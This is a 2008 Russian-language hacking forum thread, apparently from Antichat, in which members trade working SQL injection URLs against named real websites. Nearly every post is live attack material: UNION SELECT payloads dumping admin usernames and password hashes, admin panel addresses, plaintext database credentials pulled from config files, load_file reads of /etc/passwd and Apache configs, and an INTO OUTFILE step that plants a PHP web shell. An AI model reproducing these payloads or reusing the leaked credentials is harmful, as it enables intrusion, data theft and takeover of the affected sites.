Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.12.2008, 20:25
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Последний раз редактировалось sabe; 07.12.2008 в 20:48..
|
|
|
07.12.2008, 21:21
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Код:
http://www.netsetup.nl/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,userpass),5,6+from+auth_users--
логин/пасс:
Код:
harold:dfb5e2a33dc5372e6971b2dde90145ce
Код:
marc:3e3dcdc5cbb5196312d1e5def7b74806
Код:
peter:2547b2647e4860b41b570ce658e6e24b
Код:
erwin:cbd6326b959161bc0234e9c549f77034
--------------------------------------------------------
The End
Аварийное отключение компа=(((
Остальные скули выложу поже... |
|
|
|
07.12.2008, 21:36
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
http://hemuspartners.com/ask.php?id=-1+union+select+1,2,3,4,5,concat_ws(char(32,45,32), version(),user(),database()),7,8,9,10,11,12,13,14--
5.0.67-community - stefanwo_partner@localhost - stefanwo_hemusprt
http://www.computerclinic.on.ca/ask.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard - rarmstrong_usr@localhost - rarmstrong_db
http://www.esqway165.com/faq.php?id=-1+union+select+concat_ws(char(32,45,32),version(), user(),database()),2--
4.1.22-standard-log - esqwa206@localhost - esqwa206_phpbb1
http://ppcolonic.com/ask.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7--
5.0.41-community-log - ppcolonic_pspg@localhost - ppcolonic_db
Последний раз редактировалось masternet; 07.12.2008 в 22:08..
|
|
|
|
07.12.2008, 21:44
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
www.harlemstage.org
http://www.harlemstage.org/SEASON/index.php?id=-1+union+select+1,2,user(),database(),version(),6--
Version: 5.0.67-log
User: harlem_5@209.68.4.232
Database: harlem_live
Последний раз редактировалось Thrasher88; 07.12.2008 в 22:02..
|
|
|
|
07.12.2008, 22:34
|
|
Познающий
Регистрация: 29.07.2007
Сообщений: 49
Провел на форуме:
279583
Репутация:
7
|
|
sql: http://www.southworth.com/page.php?id=-1+union+select+password+from+users--
вытащил:
kelly;meex
Maryann;Meeks
но...не подходит.
админка http://www.southworth.com/manage
|
|
|
|
07.12.2008, 22:51
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
Код:
http://www.thebiggreen.net/article.php?id=952+and+1=0+union+select+1,@@version,3,4,5,6,7,8,9,10,11--
Код:
http://www.mediatunisie.com/news-web-sites-tunis-tunisia.php?id=-6+union+select+1,version(),3,4/*
Код:
http://www.sitecom.com/reviews_view.php?review=Disk+ID+-+LN-117+Disk+ID+5+stars&reviewitem=null union all select 1,2,3,4,5,6,7,8,9,10--
Код:
http://www.e-maximfashion.com/news.php?news_id=-2%20union%20all%20select%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10%20from%20admin%20--
user: admin pass: emax2006
Админка- http://www.e-maximfashion.com/admin/
Код:
http://www.meshop.ws/detail.php?id=-2+union+select+1,2,3,concat(user,0x3e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user--
|
|
|
|
07.12.2008, 23:10
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
d1aVOL
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,user,passw ord)))+from+mysql.user--
root
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/passwd%27)))+from+mysql.user+limit+0,1--
кавычки не фильтрует
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/etc/httpd/conf/httpd.conf%27)))+from+mysql.user+limit+0,1--
узнаем пути и сайты на сервере )
<VirtualHost 72.3.131.57:80>
DocumentRoot /var/www/html
ServerName southworth.com
ServerAlias www.southworth.com ...
<Directory "/var/www/html">
allow from all
Options +Indexes
</Directory>
LogLevel emerg
CustomLog /var/log/httpd/sw_access_log combined
</VirtualHost>
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/bsinclude.inc%27)))+from+mysql.user+limit+0,1--
смотрим конфиг админки
$bshostname="localhost";
$bsusername="swdata";
$bspassword="dataB88";
$bsdatabase="southworthbs";
http://www.southworth.com/page.php?id=-1+union+select+unhex(hex(load_file(%27/var/www/html/manage/.htpasswd%27)))+from+mysql.user+limit+0,1--
ну и самое главное пароли к админке:
cservice:12gesqQWYvu66
sieraci:70X9knvrU05jc
southworth:WjEHl7rauDQhc
что за хеш?
http://www.southworth.com/page.php?id=-1+union+select+%27vital evil php%27+into+outfile+%27/var/www/html/images/main2/_notes/s.php%27--
ну и конешно залитие шелла ) токо папку на запись остается наити тебе )
усе успешного вам хека! 
Последний раз редактировалось sabe; 08.12.2008 в 00:20..
|
|
|
|
08.12.2008, 02:25
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,version(),3,4,5,6%60
http://fiere.traveleurope.it/city.php?lingua=eng&city_id=-660%27+union+select+1,unhex(hex(GROUP_CONCAT(user_ name,0x3A,password))),3,4,5,6+from+adm_users%60
Версия MySQL:
5.0.58
-------
Имя базы:
traveleurope
-------
Юзер:
fiere@192.168.1.170
-------
@@basedir:
/usr/
-------
@@datadir:
/var/lib/mysql/
-------
@@tmpdir:
/tmp/
-------
@@version_compile_os:
redhat-linux-gnu
-------
mysql user:
srv1
-------
mysql password:
6f14f6e867cffa2c
Последний раз редактировалось Pashkela; 08.12.2008 в 04:28..
|
|
|
|
08.12.2008, 12:34
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633
Репутация:
155
|
|
http://www.liberte-economie.com/edit.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),vers ion(),user(),database()),5,6,7,8,9,10,11,12,13--
5.0.51a-log - economie_base@localhost - economie
|
|
|
|
08.12.2008, 13:22
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
facebook.com
Код:
http://apps.facebook.com/snowago/area.php?areaid=303021+AND+1=2+UNION+SELECT+0,VERSION(),2,3,4--
Version: 5.0.67-community |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
